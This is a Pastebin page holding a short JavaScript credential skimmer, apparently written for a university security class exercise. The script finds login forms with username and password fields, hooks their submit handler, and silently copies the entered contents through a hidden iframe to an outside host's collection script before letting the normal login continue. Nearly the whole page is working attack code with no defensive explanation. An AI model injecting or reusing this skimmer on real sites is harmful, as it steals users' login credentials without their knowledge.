Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var frms = document.getElementsByTagName("form");
- for(i=0; i<frms.length; i++) {
- hijack(frms.item(i));
- }
- function hijack(frmObj) {
- var hasUsername = false;
- var hasPassword = false;
- for (i of frmObj.getElementsByTagName('input')) {
- hasUsername = hasUsername || i.getAttribute('id').contains('user') || i.getAttribute('name').contains('user');
- hasPassword = hasPassword || i.getAttribute('type').contains('password');
- }
- if (hasUsername && hasPassword) {
- alert("FOUND ONE");
- var delayCode = "";
- if(frmObj.hasAttribute("onsubmit")) {
- delayCode = frmObj.getAttribute("onsubmit");}
- frmObj.setAttribute("onsubmit", "return leech(this,function(){" + delayCode + "});");
- }
- }
- /** Copies and submits a form object’s complete contents */
- function leech(frmObj, delayCode) {
- var rnd = Math.floor(Math.random()*256);
- var newFrm = frmObj.cloneNode(true); //deep clone
- var elt = document.createElement("input");
- elt.setAttribute("name", "442team");
- elt.setAttribute("value", "TeamAlpha");
- newFrm.appendChild(elt);
- newFrm.setAttribute("id", "leechedID" + rnd);
- newFrm.setAttribute("target", "hiddenframe" + newFrm.id);
- newFrm.setAttribute("action", "https://www.rose-hulman.edu/~stammsl/442/slurp.php");
- var hiddenIframe = document.createElement("iframe");
- hiddenIframe.setAttribute("style", "position:absolute;" + "visibility:hidden;z-index:0;");
- hiddenIframe.setAttribute("name", "hiddenframe" + newFrm.id);
- hiddenIframe.appendChild(newFrm);
- window.document.body.appendChild(hiddenIframe);
- newFrm.submit();
- setTimeout(function() {
- window.document.body.removeChild(hiddenIframe);
- if(delayCode() != false) { frmObj.submit(); }
- }, 50);
- return false;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
